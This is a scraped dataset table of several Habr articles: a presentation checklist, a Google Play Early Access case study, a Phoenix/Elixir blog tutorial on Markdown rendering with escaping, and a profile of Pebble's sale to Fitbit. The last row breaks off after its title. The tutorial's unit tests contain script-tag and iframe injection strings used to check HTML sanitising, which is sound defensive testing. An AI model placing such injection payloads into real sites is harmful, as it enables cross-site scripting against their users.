source
stringclasses 4
values | title
stringlengths 5
287
| keywords
stringlengths 6
1.23k
| summary
stringlengths 11
5.12k
⌀ | content
stringlengths 2
164k
⌀ | url
stringlengths 33
173
|
---|---|---|---|---|---|
habrahabr | Check-list для подготовки качественной презентации | ['start-up', 'стартап', 'презентация', 'выступление'] | Предлагаю к прочтению мой конспект с мастер-классов по оформлению презентаций и выступлениям с ними. Материал ориентирован на людей, продвигающих стартапы. Формат выступлений: сцена, живая публика,... | Предлагаю к прочтению мой конспект с мастер-классов по оформлению презентаций и выступлениям с ними. Материал ориентирован на людей, продвигающих стартапы. Формат выступлений: сцена, живая публика, проекция файла презентации.
Для людей с маленьким опытом — это краткое учебное пособие. А для тех, кто уже «собаку съел» — это чек-лист для проверки готовности и качества презентации.
Использовались заметки с мероприятий:
1. « Ораторское мастерство », Робер Минегулов; 19.11.2009, Лига переводчиков-волонтеров “Nead For Speak”, центр «Сэлэт», Казань.
2. « Презентация инновационных проектов », Тэос Самфост; 26.11.2009, в рамках семинара «Движение к успеху», Инновационный Технопарк «Идея», Казань.
+ личные навыки. Подготовка презентации Содержание
1. Обязательно наличие диаграмм, цифр, схем, рисунков, таблиц.
2. Презентация не должна содержать весь текст выступления! В ней должно быть визуальное представление информации для дополнительного усвоения и то, что плохо воспринимается на слух, например числа.
3. Не забывайте, что самый сок выступления должен быть в живом общении, а не в показе слайдов.
4. Последовательность должна быть логичной.
5. Должна отслеживаться четкая структура, соответствующая плану выступления.
6. Желательно подавить соблазн использовать приемы анимации. Крутящийся логотип в футере, к примеру, может сильно отвлекать внимание.
Изменение объектов на слайде по клику — это риск срыва сценария демонстрации по техническим причинам.
Если динамическая визуализация нужна по смыслу, то лучше копировать слайд целиком и вносить на него изменения. Этим способом можно даже подчеркнуть важность отдельного элемента слайда. Пример: выделить ключевое слово, создав копию слайда, на которой оно подсвечено, а остальное в копии — без изменений.
Конкретно для инновационных проектов
1. Актуальность темы.
2. Краткое введение в предметную область.
3. Раскрытие технических особенностей решения.
4. Доказать инновационность решения.
5. Сделать обзор конкурирующих, близких по тематике продуктов.
6. Показать преимущества решения.
7. Планируемая доля рынка, доход, в цифрах.
8. Стадия реализации проекта.
9. План дальнейшего развития.
10. Какие инвестиции и трудовые ресурсы нужны. Оформление
1. Если презентация ведется от лица конкретного предприятия, необходимо получить рекомендации по ее оформлению в соответствии с фирменным стилем компании. Обязательно использовать логотип компании.
2. Если презентация содержит информацию о сотрудничестве компаний, то можно использовать логотипы обоих партнеров.
3. Весьма желательно использовать статус-бар или нумерацию страниц (текущая и общее количество), чтобы зритель знал, сколько еще осталось. Возможно использование различных приемов для достижение этой цели, например, сделать в шапке или внизу страницы несколько блоков с градацией одного цвета, прошедшие слайды окрашивать в насыщенный, но не яркий тон, текущий выделять ярким, а будущие – бледным.
4. Лучше сделать много слайдов, чем нагромождать каждый слишком большим количеством информации. Выступление перед аудиторией Подготовка к выступлению Вопросы, которые надо себе задать
1. Как склонить аудиторию на свою сторону? Продумать стратегию убеждения.
2. Что знаем об аудитории? Собрать информацию.
3. Каковы центральные идеи выступления?
4. Какие идеи можно объединить в группы?
5. Отражают ли эти группы оптимальную структуру выступления? Что нужно сделать до выступления?
1. Осознать свои страхи.
2. Представить свой успех.
3. Потренироваться перед зеркалом.
4. Подготовить себе подсказки в тексте.
5. Подготовить аудиовизуальные средства.
6. Протестировать оборудование. Любые технические неполадки отвлекают внимание, сбивают с мысли и публику, и выступающего.
Если слайды показываются в темноте, то надо вставать так, чтобы не бросать на них тень, но лицо чтобы было подсвечено.
7. Чем тыкать пальцем на монитор или бросать тень от руки, показывая важное, лучше обзавестись указкой – лазерной или другой, хотя бы ручкой, и использовать ее.
8. Если в презентации есть какие-то динамические события, и нужен оператор, чтобы помочь вовремя их включать, то стоит прорепетировать это заранее.
9. Заранее ознакомиться с местом выступления. Подготовить условия: температуру воздуха, освещение, вентиляцию.
10. Выбрать подходящий случаю костюм, привести его в порядок. Костюм и образ оратора в целом не должны отвлекать от самой презентации.
В этой одежде Вы должны чувствовать себя комфортно.
11. Отдохнуть до выступления.
12. Непосредственно перед выступлением испытать какую-либо физическую нагрузку, чтобы распределить адреналин по организму. Но, конечно, не потея при этом ;)
13. Нельзя заучивать речь наизусть, слишком много повторять ее.
14. Когда публика уже собралась, нужно поинтересоваться, хорошо ли им видно проектируемый слайд, достаточно ли светло, не слишком ли ярко, не мелкий ли шрифт. Можно для этого сделать настроечный слайд.
15. Обязательно попросить выключить звук у мобильных телефонов. Звонки отвлекают не только выступающего, но и всю публику. План выступления
1. Необходимо сформулировать центральные идеи, главные мысли, тезисы. Их может быть 3, 5, 7. Они должны соответствовать группам идей.
2. Если задача стоит убедить аудиторию в чем-то, склонить к принятию определенного решения, то рекомендуется использовать тезисы в следующем порядке: сильный, слабый, самый сильный. Самый слабый тезис не использовать вообще.
3. Подготовить заключение, выводы, резолюцию.
4. Тем не менее, нельзя выступать, как робот, быть слишком логичным, слишком четко структурировать информацию.
5. Подготовиться к обсуждению и возможным вопросам. Хитрость №1 : Задать самому три вопроса и дать три готовых ответа.
Хитрость №2 : Нарочно допустить в презентации два слабых места, чтобы успешно ответить на вопросы по ним.
В ходе выступления Речь
1. Говорить громко и отчетливо, но не стоит всегда держаться одного уровня громкости. Монотонная речь хуже усваивается.
2. Не тараторить, но и не усыплять публику.
3. Вставлять короткие паузы, как бы задумываться, чтобы дать время переварить услышанное.
4. Использовать своё остроумие – шутки привлекают внимание и настраивают на позитивный лад. Не всегда стоит использовать заготовленные шутки, они могут оказаться не к месту.
Лучше не шутить совсем, если выступаете перед иностранцами или на чужом языке.
Не шутите слишком часто.
5. Не повторять одну и ту же мысль по многу раз разными словами.
6. Если Вам приходится читать много текста с бумаги, то надо читать ее так, как будто это ваша свободная речь, а не как тест на скорость чтения. Можно проглядывать текст маленькими кусками и пересказывать своими словами.
Прочитав маленький отрывок с листа, надо перевести взгляд на публику, а потом обратно на бумагу.
Проверять, поняли ли, уловили ли слушатели информацию.
7. Количество выдаваемой информации должно быть соразмерно времени на ее усвоение. Лучше всего быть лаконичным, объяснить суть вкратце и больше внимания уделить конкретным вопросам.
8. Своевременно закруглиться, не затягивать выступление. Контакт с публикой
1. Общаться с аудиторией, а не с экраном.
2. Если внимание публики угасает, можно чуть-чуть приглушить тон, чтобы люди стали прислушиваться, боясь что-то интересное и важное пропустить.
3. Постоянно анализировать слушателей, получать невербальный фидбек.
4. Зрительный контакт: 30% времени смотреть в самый центр аудитории, остальное – бродить взглядом по лицам слушателей, не забывая и про слушателей, сидящих по периферии.
5. Не смотреть куда-то над публикой, в одну точку, не держать взгляд над поверхностью, но и не заострять взгляд на конкретной персоне. Неловкие ситуации: выход из положения
1. В качестве реакции на события можно смеяться над собой, не теряя чувства собственного достоинства.
2. Если Вы нервничаете, Вас выдадут рефлекторные движения руками, например, кручение пуговицы. Это отвлекает внимание, стоит следить за собой.
3. Не стоит прятать руки за спиной. Внимание аудитории отвлекается на вопрос: а чего Вы там прячете?
4. Вы – человек, которому позволено делать ошибки, и это даже выглядит мило. Можно где-то ошибиться, но исправиться.
5. Если потеряли мысль или что-то забыли – задайте вопрос аудитории, это даст время собраться с мыслями.
6. Если есть люди, не заинтересованные по большей части в той информации, которую вы несете, попросите их покинуть аудиторию (это касается, в основном, лекций, докладов).
7. Если в каком-то углу начинается бурное закрытое обсуждение, то надо остановиться и посмотреть в ту сторону, добиться тишины. После выступления
1. Подвести итог встречи.
2. Обязательно поблагодарить публику.
3. Не задерживать людей.
4. Самому можно задержаться для сборов, чтобы дать возможность подойти и переговорить лично. | https://habrahabr.ru/post/317546/ |
habrahabr | Ранний доступ в Google Play. Что внутри? | ['Android', 'Google Play', 'Early Access'] |
Этой осенью компания Google открыла в Google Play отдельную секцию Early Access для приложений и игр, которые доступны только в бета-версии. Мое приложение попало в эту секцию через две недели... |
Этой осенью компания Google открыла в Google Play отдельную секцию Early Access для приложений и игр, которые доступны только в бета-версии. Мое приложение попало в эту секцию через две недели после запуска и находилось там два месяца.
В статье я расскажу как попал в данную секцию, как она на текущий момент функционирует и какие возможности дает для развития приложения.
В мае 2013 года компания Google предоставила разработчикам возможность публиковать свои приложения в Google Play в статусе альфы и беты. Вначале менеджмент пользователей, которые имеют доступ к бета-версии, проводился в социальной сети Google Plus. Это был логичный вариант, потому что предоставлял удобные средства для общения и позволял сразу сформировать сообщество вокруг продукта.
Google Plus так и не получила достаточную популярность. И спустя два года Google добавила возможность запускать открытый бета-тест, доступ к которому осуществлялся по прямой ссылке. А закрытый бета-тест стало возможно создать с помощью списка адресов электронной почты пользователей.
В мае 2016 года компания включила открытые бета-версии в результаты поиска и добавила возможность подписаться на бета-тест непосредственно на странице приложения. Тогда же она анонсировала создание отдельной секции Early Access для приложений и игр, которые доступны пока только в бета-версии.
1 сентября секция вышла из тестового режима и любой разработчик получил возможность отправить заявку на включение туда его приложения. Я сделал это в тот же вечер.
В середине лета я выпустил свой небольшой домашний проект в открытую бету. Социальные сети помогли собрать первую сотню установок и получить первые отзывы, а потом потихоньку начали приходить пользователи из поиска Google Play.
К концу лета проект был отлажен, улучшен, переведен на несколько языков и с технической стороны полностью был готов к релизу. Не публиковал я его потому, что не определился: рассматриваю я проект как коммерческий и буду вкладывать деньги в его продвижение или же оставлю все на домашнем уровне и превращаю публикацию в лотерею с минимальным шансом на выигрыш.
Перед подачей заявки на попадание в Early Access я не представлял себе как работает данная секция. В тот момент было известно, что она оформлена в виде коллекции, доступна с главного экрана в мобильном клиенте и не доступна в веб версии. Приложения и игры разделены на две группы и в каждой группе около 14 наименований. Большинство приложений от небольших разработчиков, но есть парочка и крупных игроков, к примеру, одно из подразделений Диснея.
В заявке надо было указать запланированную дату публикации приложения. Я предположил, что приложения в списке обновляются раз в неделю — только в таком случае через секцию сможет пройти сколь-нибудь значимое число приложений — и поставил датой публикации 19 сентября — понедельник, прикинув, что за три недели у меня будет хоть небольшой шанс на попадание в секцию.
К последней неделе из обозначенного срока я не получил никакого ответа от команды Google Play и решил, что приложение им не подошло. На выходных я уехал из города и проверил статистику только в день планируемой публикации. Цифры были для меня необычными: 74 установки в четверг 15 сентября и 290 установок в пятницу 16-го. Я подумал, что один из сайтов, куда я раньше обращался, опубликовал новость о приложении, но почтовый ящик был пуст. Тогда я вручную проверил все возможные сайты, но не нашел никаких упоминаний своего приложения. Как последний вариант я проверил секцию Early Access и неожиданно увидел, что приложение опубликовано там.
Команда Google Play прислала письмо о попадании в коллекцию Early Access только 21 сентября, спустя 6 дней после того как это случилось.
Секция Early Access новый эксперимент для Google. Правила по которым она работает будут еще не раз пересмотрены. В первые три месяца эти правила были такими: секция доступна пользователям только с мобильных устройств, веб версия доступна только по прямой ссылке.
коллекция обновляется каждый четверг, утром по EDT.
в коллекцию добавляется 2-3 новых приложения, старые приложения не удаляются.
новые приложения преимущественно добавляются в конец списка, но есть исключения.
в течение недели авторы сами удаляют приложения из списка: кто-то закрывает бета-тест, кто-то выпускает свое приложение.
несколько приложений находятся в коллекции с момента ее открытия. На текущий момент — это три с половиной месяца.
число приложений колеблется вокруг цифры 14, число игр постоянно возрастает и сейчас их более 20.
в коллекцию включают приложения доступные по всему миру или только в одной стране, как с поддержкой планшетов так и без них. Из-за этого на разных устройствах, в разных странах список приложений отличается.
Внимание пользователей к приложению зависит от его позиции в списке. Здесь действуют точно такие же правила как в обычном рейтинге: те кто находятся в начале получают много просмотров и установок, те кто в конце — меньше. Мое приложение начинало с двенадцатой позиции и постепенно переместилось до четвертой, так что мне удалось составить приблизительный график зависимости внимания пользователей от позиции.
Чем ближе приложение находилось к началу списка тем больше случайных пользователей обращало на него внимание. Число просмотров страницы приложения росло, а конверсия в установки падала и увеличивался процент удалений.
При старте приложения устанавливало 9% пользователей из тех, кто открывал его страницу. Переделав описание и скриншоты я увеличил это значение до 11%. После релиза этот показатель составляет от 15% до 35%, в зависимости от страны.
Приложение принадлежит к категории «Здоровье и фитнес». Оно переведено на английский, испанский, русский, французский и немецкий. Точные цифры верны только для моего приложения, но относительное изменение коэффициента конверсии для трафика думаю будет похожим у всех приложений.
Общий график установок и удалений за два месяца выглядит так:
За два месяца нахождения в Early Access я получил где-то 150 отзывов от пользователей через стандартную форму отзывов на странице приложения и около 10 электронных писем. Часть отзывов были достаточно полезными, но текущий инструментарий Google не позволяет вести удобную переписку, поэтому из этого канала я получил меньше информации чем мог бы. Обычно это выглядело так: я благодарил за отзыв и задавал уточняющий вопрос, стараясь уложиться в 350 символов, но никакого ответа не получал.
Для себя я решил, что перед запуском следующего бета-теста я интегрирую в приложение стороннее решения для сбора отзывов.
Много информации дала аналитика. Число пользователей позволило провести несколько A/B тестов. Но есть сложность с интерпретацией данных. Аудитория из Early Access сильно отличается от целевой аудитории приложения. К примеру, после релиза приложение устанавливают 80% женщин и только 20% мужчин. В Early Access распределение было: 60% мужчин и 40% женщин.
Самым полезным оказался отзыв от команды Google Play, который они прислали через месяц после попадания приложения в секцию. В нем было 5 пунктов, которые касались улучшения в визуальной части и поддержки новых возможностей Android. Это не был глубокий разбор приложения, но это и не был набор стандартных советов из блога разработчиков.
Внимание прессы секция Early Access привлекла только в момент запуска. Приложения, которые входили в стартовый набор, были упомянуты в ряде обзоров. У меня не получилось реализовать возможность, которую мне предоставил Google. Попадание в Early Access никак не помогло мне в продвижение приложения через другие каналы.
В настоящий момент Early Access пока еще вызывает интерес у аудитории Google Play и может быть полезным для небольших разработчиков. Это ни в коем случае не новый канал трафика, но со своей задачей — набрать базу пользователей для тестирования приложения — он справляется отлично. Отправить заявку на включение приложения в данный раздел можно здесь . | https://habrahabr.ru/post/317532/ |
habrahabr | Создание движка для блога с помощью Phoenix и Elixir / Часть 6. Поддержка Markdown | ['elixir', 'phoenix', 'earmark', 'блог', 'wunsh', 'вунш'] |
От переводчика: «Elixir и Phoenix — прекрасный пример того, куда движется современная веб-разработка. Уже сейчас эти инструменты предоставляют качественный доступ к технологиям реального... |
От переводчика: « Elixir и Phoenix — прекрасный пример того, куда движется современная веб-разработка. Уже сейчас эти инструменты предоставляют качественный доступ к технологиям реального времени для веб-приложений. Сайты с повышенной интерактивностью, многопользовательские браузерные игры, микросервисы — те направления, в которых данные технологии сослужат хорошую службу. Далее представлен перевод серии из 11 статей, подробно описывающих аспекты разработки на фреймворке Феникс казалось бы такой тривиальной вещи, как блоговый движок. Но не спешите кукситься, будет действительно интересно, особенно если статьи побудят вас обратить внимание на Эликсир либо стать его последователями.
В этой части мы подключим библиотеку Earmark для добавления возможности использования разметки Markdown.
На данный момент наше приложение основано на: Elixir : v1.3.1
Phoenix : v1.2.0
Ecto : v2.0.2
ExMachina : v1.0.2
Earmark : v1.0.1
Где мы остановились
Сейчас в нашей блоговой платформе есть роли, пользователи и посты. Также исправлены некоторые баги, обновлены зависимости и подготовлены начальные данные. Мы получили набор базовой функциональности, который по-настоящему неплох и стабилен. Если вы что-то пропустили либо присоединились только сейчас, то можете взять код из ветки 11092015 в репозитории . Реализация поддержки Markdown
Вероятно, нам следует дать людям возможность использовать разметку при написании постов. Например, Markdown — язык разметки, который великолепно подходит для ведения блогов, и при этом без проблем поддерживается языком Elixir. Так что давайте включим Markdown через стороннюю библиотеку под названием Earmark . Начнём с добавления новой зависимости внутрь функции deps в файле mix.exs : {:earmark, "~> 1.0.1"}
А затем выполним команду mix do deps.get, compile , чтобы убедиться в корректности подключения библиотеки. Если всё прошло гладко, мы можем перейти к работе над шаблонами и представлениями. Обновление представлений
Начнём с предоставления удобного способа для конвертирования текста постов в Markdown. Нам нужно избежать добавления Earmark.to_html(data) по всему проекту, так как не хочется выискивать и переписывать этот код, если мы примем решение использовать другие возможности или настройки Earmark. Для этого мы напишем функцию в файле web/views/post_view.ex , которая станет единой точкой, если потребуется что-то изменить. Откройте этот файл и добавьте следующую функцию: def markdown(body) do
body
|> Earmark.to_html
|> raw
end
У нас есть исходный текст body , который мы передаём функции to_html из библиотеки Earmark. Так как мы ожидаем получить на выходе HTML, пригодный для размещения в посте, то используем функцию raw . Я знаю, что вы подумали: «Ой, вроде бы функция raw крайне небезопасна!» . Ответ будет — «Да, всё так и есть» . Проблема в том, что нам нужно получить на выходе сырой html , чтобы суметь его отрендерить. При этом не хочется вырезать некоторые потенциально опасные теги каждый раз, когда мы выводим пост. Так что давайте откроем файл web/models/post.ex и добавим немного кода для решения задачи: def changeset(struct, params \\ %{}) do
struct
|> cast(params, [:title, :body])
|> validate_required([:title, :body])
|> strip_unsafe_body(params)
end
defp strip_unsafe_body(model, %{"body" => nil}) do
model
end
defp strip_unsafe_body(model, %{"body" => body}) do
{:safe, clean_body} = Phoenix.HTML.html_escape(body)
model |> put_change(:body, clean_body)
end
defp strip_unsafe_body(model, _) do
model
end
Мы написали приличное количество кода. Теперь давайте обсудим, что он делает. Первым делом мы внесли изменение в функцию changeset . Добавили новый вызов strip_unsafe_body(model, …) . Этот вызов, используя сопоставления с образцом, выберет одну из трёх функций. Первая — включает параметр body , равный nil . Вторая — параметр body , который нам нужно очистить. И третья — для контрольного отлова остальных вызовов.
Мы используем функцию put_change для замены текста body , очищенной с помощью функции html_escape из Phoenix.HTML версией. Эта функция принимает текст и возвращает кортеж {:safe, cleaned_up_body} в случае успеха.
Написания кода без тестов огорчает меня, особенно для такого функционала, как здесь. Давайте же протестируем его! Написание тестов
Так как теперь мы зависим от этого кода, нужно должным образом его протестировать. defmodule Pxblog.PostTest do
use Pxblog.ModelCase
alias Pxblog.Post
@valid_attrs %{body: "some content", title: "some content"}
@invalid_attrs %{}
test "changeset with valid attributes" do
changeset = Post.changeset(%Post{}, @valid_attrs)
assert changeset.valid?
end
test "changeset with invalid attributes" do
changeset = Post.changeset(%Post{}, @invalid_attrs)
refute changeset.valid?
end
test "when the body includes a script tag" do
changeset = Post.changeset(%Post{}, %{@valid_attrs | body: "Hello <script type='javascript'>alert('foo');</script>"})
refute String.match? get_change(changeset, :body), ~r{<script>}
end
test "when the body includes an iframe tag" do
changeset = Post.changeset(%Post{}, %{@valid_attrs | body: "Hello <iframe src='http://google.com'></iframe>"})
refute String.match? get_change(changeset, :body), ~r{<iframe>}
end
test "body includes no stripped tags" do
changeset = Post.changeset(%Post{}, @valid_attrs)
assert get_change(changeset, :body) == @valid_attrs[:body]
end
end
Для начала нужно изменить объявление @valid_attrs . Мы получаем данные из контроллера в виде словаря со строковыми ключами (не атомами). Если мы ничего не изменим, то тесты упадут.
Затем импортируем get_change/2 из Ecto.Changeset , чтобы доставать изменённое значение из ревизии. Наконец, мы пишем несколько тестов: Когда в теле поста есть тег script .
Когда в теле поста есть тег iframe .
Когда в теле поста нет недопустимых тегов.
Перезапустим тесты. Они должны быть зелёными. Нам осталось написать ещё один тест, немного базового UI и всё будет готово! Написание тестов для хелпера Markdown
Нам также нужно добавить небольшой тест на вспомогательную функцию для Markdown, которую мы написали в модуле Post View. Хорошая новость — этот тест очень легко написать.
Для этого создайте файл test/view/post_view_test.exs и заполните его следующим содержимым: defmodule Pxblog.PostViewTest do
use Pxblog.ConnCase, async: true
test "converts markdown to html" do
{:safe, result} = Pxblog.PostView.markdown("**bold me**")
assert String.contains? result, "<strong>bold me</strong>"
end
test "leaves text with no markdown alone" do
{:safe, result} = Pxblog.PostView.markdown("leave me alone")
assert String.contains? result, "leave me alone"
end
end
Теперь запустите тесты, убедитесь, что они зелёные, и с правкой тестов будет покончено. Обновление пользовательского интерфейса
Прямо сейчас у нас есть возможность добавлять полноценные посты, но UI не позволяет написать ничего больше одной строчки. Мы изменим стандартную форму, чтобы работать с текстовой областью вместо текстового поля, а также подключим классный редактор.
Откройте файл web/templates/post/form.html.eex и добавьте параметр id со значением "body-editor" . Окончательно, строчка должна выглядеть следующим образом: <%= textarea f, :body, class: "form-control", id: "body-editor" %>
Наконец, добавьте следующий код вниз нашего шаблона формы (файл web/templates/post/form.html.eex ): <link rel="stylesheet" href="//cdn.jsdelivr.net/simplemde/latest/simplemde.min.css">
<script src="//cdn.jsdelivr.net/simplemde/latest/simplemde.min.js"></script>
<script>var simplemde = new SimpleMDE();</script>
После обновления странички, вы должны увидеть очень аккуратный интерфейс для написания постов. Начинает становиться похоже на настоящую блоговую платформу!
Наконец, откройте файл web/templates/post/show.html.eex и замените строчку с выводом тела поста на функцию markdown(body) , которую мы определили в представлении. <%= markdown(@post.body) %> Заключение
Теперь у нас есть улучшенное средство для редактирования/форматирования постов и редактор, выглядящий гораздо, гораздо приятнее! Возможно, вам захочется немного поправить шаблон, например, добавить возможность писать комментарии. Но комментарии — отличный способ для применения каналов, так что давайте отложим это дело до следующей статьи.
Законченная версия кода из этой части лежит в ветке add_markdown_support нашего репозитория.
Другие части: Вступление
Авторизация
Добавляем роли
Обрабатываем роли в контроллерах
Подключаем ExMachina
Поддержка Markdown
Скоро...
Не забывайте подписываться на нашу рассылку, в которой мы дважды в неделю выкладываем интересные статьи по Эликсиру на русском языке .
Успехов в изучении! | https://habrahabr.ru/post/317550/ |
habrahabr | Сведения из первоисточника по поводу кончины Pebble | ['pebble', 'fitbit', 'слияния', 'поглощения', 'провал', 'кремниевая долина', 'Эрик Мигиковски'] | Генеральный директор вздорного производителя умных часов объясняет, что пошло не так, и почему Fitbit отхватил себе компанию
Если следовать мифологии Кремниевой долины, то Эрик Мигиковски... | Генеральный директор вздорного производителя умных часов объясняет, что пошло не так, и почему Fitbit отхватил себе компанию
Если следовать мифологии Кремниевой долины, то Эрик Мигиковски должен кипеть от возмущения. Ведь он провалился. Последние девять лет он круглосуточно проводил время, и творил время в Pebble, компании, производящей умные часы, начатой им, когда ему было 21 год. Тогда молодой Эрик учился за границей, в городе Делфт в Нидерландах, славящемся больше потреблением марихуаны, чем технологиями. Его жизненный путь поистине легендарен: не особо успешный стартап в Y Combinator, герой Kickstarter, создатель своей платформы и продавец более чем двух миллионов умных часов. Выглядит круто, но этого оказалось недостаточно. Pebble теряла деньги, а прибыли не было видно.
Так что 6 декабря Мигиковски продал копанию, включая всю интеллектуальную собственность, Fitbit, которая обещала нанять 40% от текущих работников Pebble. В 30 лет он впервые будет взрослым, не имеющим звания генерального директора. И в культуре, сделавшей провал своим фетишем, он заслужил высшую награду: разбившийся и сгоревший стартап.
Но он не кипит от возмущения.
И не плачет, и не рыдает. Когда я встретил этого долговязого, двухметрового, бородатого канадца на прошлой неделе в закусочной в Пало Альто, Мигиковски был всё тем же радостным и внимательным парнем, которого я знал в более перспективные времена, хотя наше общение и получилось необычно сдержанным. Ведь мы встречались в тот день, когда была закрыта сделка с Fitbit.
Мигиковски согласился встретиться со мной, потому что я вёл периодические хроники его компании. Я брал у него интервью во времена, когда это был одинокий железячный стартап в Y Combinator (тогда компания называлась Alerta, и они разрабатывали часы InPulse). За последние два года наше издание наведывалось к нему несколько раз, и мы делали серию статей «Приключения Pebble». Я специально поехал к нему на следующий день после анонса Apple собственных умных часов. Мигиковски сказал, что Pebble выиграет от такого признания носимых продуктов. Я видел раннюю версию очень клёвой модели Pebble Time Round. А в этом году я радостно наблюдал за расширением продуктовой линейки безэкранным гаджетом, который должен вешаться на кольцо для ключей и передавать музыку, одновременно оценивая качество вашей пробежки. И когда мы договаривались о встрече, он озвучил мои мысли: я буду писать о последнем приключении Pebble.
«В поисках приключений» – так можно описать текущий год Pebble. 2016-й начался в кризисе. За год до этого компания, когда-то прибыльная, ушла в красную зону, и встретила вторую половину года, не выполнив плана продаж. Pebble не суждено было стать прибыльной. В марте 2016 Мигиковски уволил четверть сотрудников из 160, почти одновременно с тем, как компания переехала из тесного лофта в Пало Альто в просторный сверкающий офис в пригороде Редвуд Сити. Они оптимистично арендовали два этажа, а сейчас уже умещаются на одном.
Оказалось, что Pebble – как и Apple – неправильно оценили рынок носимых гаджетов. Идея носить iPhone на запястье не прижилась. Единственным классным приложением для наручных устройств, судя по всему, остаётся фитнес. Активным людям нравится использовать гаджет, считывающий биометрические показатели и отслеживающий занятия. Упор Apple на моду, а Pebble – на продуктивность и инновации третьих лиц оказались дорогими отклонениями. Рынок умных часов укоренился в здоровье и фитнесе. «Мы слишком поздно это поняли, и Apple сейчас тоже это понимает», говорит Мигиковски. Он признаёт, что уведомления – возможно, вторая ключевая особенность умных часов. «Мы не поняли этого в 2014 – если бы мы тогда позиционировали себя, как умные часы для фитнеса, то возможно, всё было бы по-другому».
В её пользу скажем, что Pebble быстро подхватывала изменения. В этом году Pebble анонсировала продукты, концентрирующиеся на фитнесе, в частности, Pebble Core, тот самый гаджет для кольца с ключами. Отметим, что второе поколение Apple Watch также нацелено на любителей фитнеса . Pebble также представила новые часы с оптимизацией для приложений, связанных со здоровьем, и с отслеживанием пульса. В апреле на Kickstarter анонс собрал более $12 млн .
Но всё это пришло слишком поздно, и у Pebble не получилось собрать продажи, способные спасти компанию. Core стал продуктом-призраком, отличный прототип, который так никогда и не получат 24000 покупателей с Kickstarter (им обещают вернуть деньги).
Но в апреле Мигиковски не сказал мне, что возвращение Pebble на Kickstarter для рекламы Core было вызвано невозможностью найти финансирование. «После увольнений сложно было найти деньги. Это был тормозящий фактор», говорит он сейчас. «Поэтому мы и пошли на Kickstarter. После Kickstarter мы вновь попробовали найти финансирование, и у нас ничего не вышло».
Весной и летом Мигиковски пробовал всё, чтобы оставить компанию на плаву, особенно активно действовал летом, а затем его попытки потеряли скорость ввиду наступления неудачного сезона праздников. Новые продукты задерживались, график выхода переполз на 2017 год. «В сентябре была настоящая лихорадка,- говорит он. – Я летал по всему миру, был в Китае, пытался продавать лицензии на операционку, беседовал с инвесторами – а это были уже совсем не те инвесторы, с которыми ты разговариваешь на других этапах стартапа». Он посещал не самых крутых венчурных инвесторов, а частные акционерные компании, семейные инвестиционные предприятия – компании, находящиеся вне технических кругов.
Он придумывал разные альтернативы, даже размышлял над краудсорсинговым финансированием. Но из-за критики за слишком частые выходы на Kickstarter этот вариант был отброшен. Как и другие варианты развития, включая такой пожарный, как «уволить всех, кроме десятка человек, и посмотреть, что будет».
В октябре Мигиковски принял окончательное решение о том, что Pebble утонула. Настало время продавать то, что есть, оставляя в приоритете защиту потребителей, радея за разработчиков и делая всё, что можно, для сотрудников. Как ни странно, поворотный момент зарядил энергией его и всех директоров компании. «Когда в октябре решение было принято, дальше всё было прямолинейно,- вспоминает он. – У нас была миссия, и нам надо было продать компанию».
Лучшим покупателем оказалась Fitbit, лидер в производстве носимых устройств для фитнеса, недавно зашедшая на рынок умных часов.
Мигиковски говорит, что в Fitbit его привлекло (несмотря на скромную компенсацию, которую Bloomberg Business Week оценила в $40 млн) согласие компании не избавляться от разработчиков и пользователей Pebble. Хотя неясно, как всё повернётся – будут ли в будущем часы Fitbit работать на ОС от Pebble? – Мигиковски даёт понять в своём блоге, что сделка может расширить пользовательскую базу данных Pebble с двух миллионов до 50 миллионов. " Fitbit делает всё возможное для поддержки разработчиков", говорит Мигиковски.
Хотя все подробности сделки не разглашаются, из анонсов в блогах компаний ясно, что сделка представляет собой продажу активов, включающих софт Pebble, прошивки, патенты – но не само железо или другие физические активы. Pebble отвечает по своим долгам. Несколько сотрудников Pebble, или, как их называют, пеблеров, присоединятся к Fitbit; в большинстве это инженеры. Мигиковски подтвердил, что остальные получат выходное пособие.
Часы Pebble продолжат тикать, и Fitbit сначала продолжит поддерживать Pebble, хотя гарантия уже действовать не будет. Создатели приложений и аддонов пока ещё могут продавать их уменьшающемуся сообществу любителей Pebble. Заказчикам продукции с Kickstarter вернут деньги.
У Fitbit есть свои проблемы – в прошлом месяце они урезали прогнозы продаж , а стоимость акций упала до исторического минимума – но дополнение в виде опыта инженеров Pebble и патентов на некоторые их инновации, возможно, улучшат будущие продукты Fitbit. Забавно, что в прошлом апреле Мигиковски приводил Fitbit как пример компании, раньше других понявшей, что фитнес станет основной функцией носимых часов, и работала с упором на это. «У них есть график перехода от здоровья и фитнеса на более универсальные часы», сказал мне он. «У нас обратная ситуация, мы начали с часов общего назначения, и нам пришлось разобраться с тем, что здоровье – одна из тем, интересующих пользователей Pebble». Он, конечно, не подозревал, что Fitbit попробует осуществить этот переход при помощи остатков его собственной компании.
Пресс-релиз от Джеймса Парка, генерального директора и сооснователя Fitbit, поддерживает эту теорию: «В то время, как носимая электроника умнеет, а умные часы добавляют возможности работы со здоровьем и фитнесом, вы видим возможность на основании наших сильных сторон расширить наши лидирующие позиции в категорию носимой электроники».
Мигиковски не пойдёт работать в Fitbit. Он не подтверждает и не опровергает слухи о работе в Y Combinator. В любом случае он не уходит из Pebble богатым человеком. «Это не такая сделка,- говорит он. – Она в основном касается пользователей, сотрудников и продавцов».
Сожаления?
«Я бы мало что поменял,- говорит он. – Всё шло не точно по плану, но так вообще редко бывает. Мы попробовали. Мы создали отличный продукт, мы его выпускали, запустили рынок… И не смогли сделать следующий шаг».
А что насчёт этого знака отличия от Кремниевой долины, известного, как провал? Мигиковски не считает, что ему полагается такой знак. «Я не следовал мантре 'быстрого провала' », — говорит он о своей девятилетней одиссее. Но для него целью этой продажи было сохранение – возможность продолжения взращивания построенного им сообщества. «Это не огромное сообщество, но думаю, что достаточно крупное: два миллиона человек по всему миру», говорит он.
Как по мне, Эрик Мигиковский достиг очень многого для своего возраста, до 30 лет. И не смотря на внезапное завершение, Pebble была инновационной и расширяющейся компанией, предлагавшей качественные продукты своим пользователям и благодарное сообщество для разработчиков. Это был глоток свежего воздуха в том пространстве, где большие компании соревнуются с мрачной и не всегда верной решимостью. Ему всего 30, и у Мигиковски ещё полно времени для будущей славы. И полно оставшихся часов для отслеживания этого времени. | https://geektimes.ru/post/283662/ |
habrahabr | Rollback in Cisco IOS XR | ['cisco', 'juniper', 'rollback', 'commit', 'ios xr', 'junos'] |
